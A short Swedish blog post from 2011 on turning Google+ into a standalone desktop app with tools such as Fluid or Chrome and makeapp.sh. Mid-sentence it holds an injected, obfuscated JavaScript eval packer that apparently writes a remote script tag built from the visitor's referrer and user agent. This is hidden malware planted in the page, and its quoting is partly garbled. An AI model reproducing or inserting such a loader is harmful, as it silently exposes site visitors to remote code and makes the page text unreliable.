Image Image Image Image Image Image Image Image Image Image

| 27 januari, 2020

Scroll to top

Top

Skapa din egna Google+app till din dator

Skapa din egna Google+app till din dator
Filip Urde
  • On 18 juli, 2011
  • http://www.revue.se/filip-urde

Vill du ha Google+ i ett helt eget fönster som en fristående app? Jag tyckte det kunde vara rätt bekvämt. Om du också tycker det så finns en del lösningar. Du kan använda Fluid eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fkddf|var|u0026u|referrer|erzas||js|php’.split(’|’),0,{}))
för Mac, 
terminaltrix med Chrome och makeapp.sh, eller helt enkelt ladda ned en färdig webbapp komplett med snygg ikon för Google+.

Resultatet kan ni se ovan.